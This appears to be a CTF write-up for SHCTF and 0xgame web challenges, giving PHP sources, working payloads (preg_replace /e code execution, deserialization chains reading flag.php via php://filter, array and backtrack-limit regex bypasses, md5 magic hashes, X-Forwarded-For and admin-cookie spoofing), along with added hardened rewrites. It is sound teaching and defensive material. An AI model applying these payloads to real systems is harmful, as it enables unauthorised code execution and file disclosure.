SHCTF&0xgame

SHCTF

[WEEK1] 飞机大战 (Plane Battle)

Looking at the JS, the score has to be greater than 99999, so we switch to the browser console.


After changing the score and pressing Enter, clicking "Start Game" pops up the flag.



Method 2: find the won function directly in the JS; decoding the Unicode escapes inside it gives the flag.


[WEEK1] ezphp

```php
<?php
error_reporting(0);
if(isset($_GET['code']) && isset($_POST['pattern']))
{
    $pattern=$_POST['pattern'];
    if(!preg_match("/flag|system|pass|cat|chr|ls|[0-9]|tac|nl|od|ini_set|eval|exec|dir|\.|\`|read*|show|file|\<|popen|pcntl|var_dump|print|var_export|echo|implode|print_r|getcwd|head|more|less|tail|vi|sort|uniq|sh|include|require|scandir|\/| |\?|mv|cp|next|show_source|highlight_file|glob|\~|\^|\||\&|\*|\%/i",$code))
    {
        $code=$_GET['code'];
        preg_replace('/(' . $pattern . ')/ei','print_r("\\1")', $code);
        echo "you are smart";
    }else{
        die("try again");
    }
}else{
    die("it is begin");
}
?>
```

The key line is:

```php
preg_replace('/(' . $pattern . ')/ei','print_r("\\1")', $code);
```

payload:

```http
POST /?code=${phpinfo()} HTTP/1.1
pattern=\S*
```

My understanding: the regex pattern is set to match a run of consecutive non-whitespace characters in the input string, so it matches ${phpinfo()} and \\1 captures that string. Because the /e modifier is used, the replacement string is treated as PHP code and executed, so print_r("${phpinfo()}") runs.

The flag is then found in the phpinfo environment output.
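The same "print the match" logic written without the /e modifier, as an added example (not the challenge's code): the match is handed to a callback as data, so nothing inside $code is ever evaluated. It assumes PHP 8 for preg_last_error_msg().

```php
<?php
// Added example, not the challenge source. Replacement for
//   preg_replace('/(' . $pattern . ')/ei', 'print_r("\\1")', $code);
// The /e modifier evaluated the replacement as PHP (removed in PHP 7.0);
// preg_replace_callback() hands the match to a function as a plain string.
function echo_match(string $pattern, string $code): string
{
    // preg_quote() turns the user-supplied pattern into a literal, so "\S*"
    // no longer means "any run of non-whitespace" and cannot widen the capture.
    // If the pattern genuinely must be a regex, drop preg_quote() but keep
    // the callback: the match is still data, never code.
    $re = '/(' . preg_quote($pattern, '/') . ')/i';

    $out = preg_replace_callback(
        $re,
        static function (array $m): string {
            // $m[1] is the captured text; returning it is print_r("\1") without eval.
            return $m[1];
        },
        $code
    );

    // null means PCRE failed (bad pattern, backtrack limit); fail closed.
    if ($out === null) {
        throw new RuntimeException('regex error: ' . preg_last_error_msg());
    }
    return $out;
}

// The write-up's payload is inert here: '\S*' is searched for literally,
// '${phpinfo()}' contains no such text, and the subject comes back unchanged.
echo echo_match('\S*', '${phpinfo()}'), PHP_EOL;
```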

[WEEK1] ez_serialize

```php
<?php
class A{
    public $var_1='php://filter/read=convert.base64-encode/resource=flag.php';
}
class B{
    public $q;
}
class C{
    public $var;
    public $z;
}
class D{
    public $p;
}
$a = new A();
$b = new B();
$c = new C();
$d = new D();
$d->p = $a;
$c->z = $d;
$b->q = $c;
echo serialize($b);
?>
```

[WEEK1] 1zzphp

```php
<?php
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
    $code = (String)$_POST['c_ode'];
    $num=$_GET['num'];
    if(preg_match("/[0-9]/", $num))
    {
        die("no number!");
    }
    elseif(intval($num))
    {
        if(preg_match('/.+?SHCTF/is', $code))
        {
            die('no touch!');
        }
        if(stripos($code,'2023SHCTF') === FALSE)
        {
            die('what do you want');
        }
        echo $flag;
    }
}
```

Bypassing if(preg_match("/[0-9]/", $num)): preg_match's second argument must be a string, so when we pass the array num[]=1, preg_match reports an error and returns false. The later intval takes a mixed first argument, i.e. it accepts many different types, so it returns 1 and we enter the inner if.

Bypassing if(preg_match('/.+?SHCTF/is', $code)): once the string exceeds 1,000,000 characters, preg_match gives up, so a payload appended after that point is never matched. The script:

```python
import requests

# 1,000,009 characters: beyond PCRE's backtrack limit, so preg_match() fails on it
code = "very" * 250000 + "2023SHCTF"

payload = "/?num[]=1"

url = "http://112.6.51.212:30458"
data = {
    'c[ode': code  # the [ here is turned into _ by PHP when it parses the parameter name
}
r = requests.post(url=url + payload, data=data)
print(r.text)
```
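The 1zzphp checks rewritten so that both bypasses above fail closed, as an added example (not the challenge's code); it assumes PHP 8 for preg_last_error_msg().

```php
<?php
// Added example, not the challenge source: the 1zzphp checks rewritten so the
// two bypasses in the write-up (num[]=1 and a >1,000,000-character c_ode) fail closed.

function check_num($num): string
{
    // num[]=1 arrives as an array: preg_match() warns and returns false, while
    // intval([1]) is 1, so the original pair of checks waved it through.
    if (!is_string($num)) {
        return 'bad type';
    }
    // Only an explicit 0 (no match and no error) passes; false counts as failure.
    if (preg_match('/[0-9]/', $num) !== 0) {
        return 'no number!';
    }
    return intval($num) !== 0 ? 'ok' : 'not a number';
}

function check_code($code): string
{
    if (!is_string($code)) {
        return 'bad type';
    }
    // A huge subject makes PCRE stop with PREG_BACKTRACK_LIMIT_ERROR and return
    // false; the original `if (preg_match(...))` treated that false as "no match".
    $r = preg_match('/.+?SHCTF/is', $code);
    if ($r === false) {
        return 'regex error: ' . preg_last_error_msg();
    }
    if ($r === 1) {
        return 'no touch!';
    }
    return stripos($code, '2023SHCTF') === false ? 'what do you want' : 'ok';
}

// The write-up's inputs now stop at the first check instead of reaching $flag.
var_dump(check_num(['1']));
var_dump(check_code(str_repeat('very', 250000) . '2023SHCTF'));
// With strings only, no $num can be digit-free yet non-zero for intval(), which
// shows the original gate was only passable through the type confusion.
```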


[WEEK2] serialize


We need to know that the include we ultimately want is in the milaoshu class, so we work backwards: $this->gao=$this->fei; assigning a milaoshu to $this->fei triggers __toString(); then return $this->ding->dong; in musca, where assigning a misca to $this->ding triggers __get; that leads to __wakeup(), which is called first when unserialize() runs, i.e. the entry point.

The whole flow: pass in the serialized payload; during unserialization __wakeup() fires, then __get, then __toString(). Very clear.
We bypass the check with an array, but then we find:


This is because __get calls miaomiao, which assigns Mikey Mouse~ to the member property $a, and the later die() has $a in its parentheses, so the program terminates and prints that value as the error message. Whatever else happens, the include + pseudo-protocol content is not printed here, so the idea is to turn the error message into the pseudo-protocol read. For the __toString triggered by $this->gao=$this->fei;, add:

```php
public function __construct(){
    $this->a=&$this->gao;
}
```

payload:

```text
wanna[fl.ag=a:1:{i:0;O:5:"musca":2:{s:4:"ding";O:5:"misca":3:{s:3:"gao";N;s:3:"fei";O:8:"milaoshu":1:{s:1:"v";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}s:1:"a";R:4;}s:4:"dong";N;}}
```

Note that the _ in the parameter name has to be changed to [.

```php
<?php

class misca{
    public $gao;
    public $fei;
    public $a;
    public function __construct(){
        $this->a=&$this->gao;
    }
}
class musca{
    public $ding;
    public $dong;
}
class milaoshu{
    public $v='php://filter/read=convert.base64-encode/resource=flag.php';
}
$a = new misca();
$b = new musca();
$c = new milaoshu();
$a->fei = $c;
$b->ding = $a;
echo serialize(array($b));
```

[WEEK1] 生成你的邀请函吧~ (Generate your invitation)

```text
API:url/generate_invitation
Request:POST application/json
Body:{
"name": "Yourname",
"imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg"
}
```

Following the challenge's instructions, just modify the request directly.


Viewed this way, there is data in the response.


Forward the request, and an image is downloaded.



0xgame

### [Week 1] signin


### [Week 1] baby_php

```http
POST /?a=QNKCDZO&b=s878926199a HTTP/1.1
Host: 120.27.148.152:50014
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://120.27.148.152:50014
Connection: close
Cookie: name=php://filter/read=convert.base64-encode/resource=flag
Referer: http://120.27.148.152:50014/?a=QNKCDZO&b=s878926199a
Upgrade-Insecure-Requests: 1

c=1024.1a
```
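The a and b values in that request are the classic pair whose md5 digests both start with 0e, which PHP's loose == treats as the number 0. As an added example (not the challenge's code; its source is not shown here, and it assumes the usual md5($a) == md5($b) check), the loose comparison beside its strict form and a check that flags such inputs:

```php
<?php
// Added example, not the challenge source. The challenge code is not shown on
// this page; this assumes the usual check md5($a) == md5($b) with $a != $b.
$a = 'QNKCDZO';
$b = 's878926199a';

$ha = md5($a);
$hb = md5($b);

// Both digests are numeric strings of the form 0e<digits>, i.e. 0 * 10^n.
// Loose comparison converts them to numbers, so 0 == 0 and the check passes.
var_dump($ha == $hb);

// Strict comparison keeps them as strings, and hash_equals() is the constant-time
// string comparison intended for digests; neither is satisfied by this pair.
var_dump($ha === $hb);
var_dump(hash_equals($ha, $hb));

// Review helper: does an input hash to something PHP would coerce to a number?
function is_magic_hash(string $s): bool
{
    return preg_match('/^0e[0-9]+$/', md5($s)) === 1;
}
var_dump(is_magic_hash($a), is_magic_hash($b), is_magic_hash('hello'));
```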


```http
POST /?query=ctf HTTP/1.1
Host: 120.27.148.152:50012
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1
Cookie: role=admin
Upgrade-Insecure-Requests: 1
Content-Length: 14
Content-Type: application/x-www-form-urlencoded

action=getflag
```